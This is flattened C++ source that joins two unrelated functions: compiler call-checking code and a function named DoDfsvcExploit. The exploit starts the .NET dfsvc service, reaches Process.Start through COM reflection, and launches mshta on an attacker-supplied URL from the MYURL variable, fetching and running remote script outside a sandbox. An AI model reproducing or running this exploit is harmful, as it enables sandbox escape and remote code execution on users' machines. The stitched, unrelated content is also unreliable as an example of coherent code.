AST::Value CallValue(Context& context, AST::Value rawValue, HeapArray<AST::Value> args, const Debug::SourceLocation& location) { auto value = derefValue(std::move(rawValue)); if (getDerefType(value.type())->isTypename()) { return CallValue(context, GetStaticMethod(context, std::move(value), context.getCString("create"), location), std::move(args), location); } if (!value.type()->isCallable()) { // Try to use 'call' method. if (TypeCapabilities(context).hasCallMethod(getDerefType(value.type()))) { return CallValue(context, GetMethod(context, std::move(value), context.getCString("call"), location), std::move(args), location); } else { context.issueDiag(TypeNotCallableDiag(getDerefType(value.type())), location); return AST::Value::Constant(Constant::Integer(0), context.typeBuilder().getIntType()); } } const auto functionType = value.type()->asFunctionType(); const auto& typeList = functionType.parameterTypes(); if (functionType.attributes().isVarArg()) { if (args.size() < typeList.size()) { context.issueDiag(VarArgTooFewArgsDiag(value.toDiagString(), args.size(), typeList.size()), location); } } else { if (args.size() != typeList.size()) { context.issueDiag(CallIncorrectArgCountDiag(value.toDiagString(), args.size(), typeList.size()), location); } } if (!TypeCapabilities(context).isSized(functionType.returnType())) { // TODO: also check that the type is not abstract. context.issueDiag(CallReturnTypeIsUnsizedDiag(functionType.returnType()), location); } if (functionType.returnType()->hasConst()) { context.issueDiag(CallReturnTypeIsConstDiag(functionType.returnType()), location); } return addDebugInfo(AST::Value::Call(std::move(value), CastFunctionArguments(context, std::move(args), typeList, location), functionType.returnType()->stripConst()), location); }
void DoDfsvcExploit() { CLSID clsid; CLSIDFromString(CLSID_DFSVC, &clsid); DebugPrintf("Starting DFSVC Exploit\n"); mscorlib::_ObjectPtr obj; HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); if (FAILED(hr)) { WCHAR cmdline[] = L"dfsvc.exe"; STARTUPINFO startInfo = { 0 }; PROCESS_INFORMATION procInfo = { 0 }; // Start dfsvc (because we can due to the ElevationPolicy) if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo)) { CloseHandle(procInfo.hProcess); CloseHandle(procInfo.hThread); // Just sleep to ensure it comes up Sleep(4000); hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); } else { DebugPrintf("Couldn't create service %d\n", GetLastError()); } } if (SUCCEEDED(hr)) { try { mscorlib::_TypePtr type = obj->GetType(); // Get type of Type (note defaults to RuntimeType then TypeInfo) type = type->GetType()->BaseType->BaseType; DebugPrintf("TypeName: %ls", type->FullName.GetBSTR()); mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1); DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod); std::vector<variant_t> getTypeArgs; getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"); // Get process type type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs); if (type) { mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2); if (startMethod) { std::vector<variant_t> startArgs; startArgs.push_back(L"mshta"); startArgs.push_back(GetEnv(L"MYURL")); ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); } else { DebugPrintf("Couldn't find Start method"); } } else { DebugPrintf("Couldn't find Process Type"); } } catch (_com_error e) { DebugPrintf("COM Error: %ls\n", e.ErrorMessage()); } } else { DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr); } }